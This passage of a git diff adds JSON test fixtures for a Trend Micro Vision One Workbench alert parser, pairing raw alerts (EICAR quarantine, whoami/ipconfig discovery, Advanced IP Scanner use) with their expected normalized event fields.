[\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"WINDOWS10\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"text\", \"field\": \"actResult\", \"value\": \"File quarantined\", \"relatedEntities\": [\"ecede9e8-407e-4f34-9747-4a145c247ad5\"], \"filterIds\": [\"4c2fd712-e89a-440a-b789-9bfcd8afd443\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "action": "File quarantined", + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Eicar Test File Detection", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:51:29Z", + "file": { + "hash": { + "sha1": "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + }, + "name": "eicar-com.txt", + "path": "C:\\Users\\jdoe\\Downloads\\eicar-com.txt" + }, + "host": { + "id": "ecede9e8-407e-4f34-9747-4a145c247ad5", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "related": { + "hash": [ + "667DB0B8AE0C459133E30F4147A1CAC47CAFDDF8" + ], + "ip": [ + "10.0.0.6" + ] + }, + "rule": { + "name": "Eicar Test File Detection" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "detection_name": "Eicar_test_1", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json new file mode 100644 index 000000000..edbe26be4 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json 
@@ -0,0 +1,77 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": \"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": 
\"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": 
[\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": 
\"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], 
\"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000\", \"alertProvider\": \"SAE\", \"modelId\": \"b4e0f834-178b-4a3d-a5ef-d44c603d1a48\", \"model\": \"Potential Information Gathering\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-11-26T16:48:06Z\", \"updatedDateTime\": \"2024-11-26T16:48:06Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"name\": \"windows10\", \"ips\": [\"10.0.0.6\"]}, \"entityId\": \"7b00c266-f17f-439f-bb94-3945d463a78b\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20], \"provenance\": [\"Alert\"], \"managementScopeGroupId\": \"7f56b5b6-4fba-42b1-a1c8-d4fa64300f4a\"}]}, \"description\": \"A process has executed multiple discovery tools.\", \"matchedRules\": [{\"id\": \"1be9b378-eb8a-4736-92ba-55c184b2ca55\", \"name\": \"Potential Information Gathering\", \"matchedFilters\": [{\"id\": \"7062d4bd-33ca-4634-8f04-a7e4e8698548\", \"name\": \"WhoAmI Execution\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"mitreTechniqueIds\": [\"T1033\"], \"matchedEvents\": [{\"uuid\": 
\"54955525-b5ac-4b31-b5b7-0e03ba25aa4a\", \"matchedDateTime\": \"2024-11-26T16:41:05.352Z\", \"type\": \"TELEMETRY_PROCESS\"}]}, {\"id\": \"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\", \"name\": \"IPconfig Execution\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"mitreTechniqueIds\": [\"T1016\"], \"matchedEvents\": [{\"uuid\": \"7a733f00-faa0-4ac2-b97c-34d8f3ffd230\", \"matchedDateTime\": \"2024-11-26T16:44:46.602Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\whoami.exe\\\"\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\ipconfig.exe\\\" /all \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"\\\"C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\PowerShell_ISE.exe\\\" \", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": 
\"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\Explorer.EXE\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": 
[\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell_ise.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"7062d4bd-33ca-4634-8f04-a7e4e8698548\"], \"provenance\": [\"Alert\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"processPid\", \"value\": \"5040\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": 
\"process_id\", \"field\": \"parentPid\", \"value\": \"9920\", \"relatedEntities\": [\"7b00c266-f17f-439f-bb94-3945d463a78b\"], \"filterIds\": [\"3dd8bb20-ed9f-4a3d-953e-d0b9d5b41eeb\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Potential Information Gathering", + "type": [ + "info" + ], + "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000" + }, + "@timestamp": "2024-11-26T16:48:06Z", + "host": { + "id": "7b00c266-f17f-439f-bb94-3945d463a78b", + "ip": [ + "10.0.0.6" + ], + "name": "windows10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "\"C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\PowerShell_ISE.exe\" ", + "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", + "hash": { + "sha1": "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "sha256": "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + }, + "parent": { + "command_line": "C:\\Windows\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753" + }, + "pid": 9920 + }, + "pid": 5040 + }, + "related": { + "hash": [ + "4F4FC8C541243BF4313ECE43A77D9D63ADFD18D5E92E0C3FA0E30975AEF14753", + "4FBAF220ABAA6375FF0EC0FEEEF774631CF6BC55", + "A056D5DCF392801A743CC965B470B5BFB5C847341457DBF9372911D6DA3783F8" + ], + "ip": [ + "10.0.0.6" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "Potential Information Gathering" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "windows10", + "id": "windows10\\jdoe", + "name": "jdoe" + } + } +} \ No newline at end of file 
diff --git a/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json new file mode 100644 index 000000000..d15f28c6f --- /dev/null +++ b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json 
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", 
\"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], 
\"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, 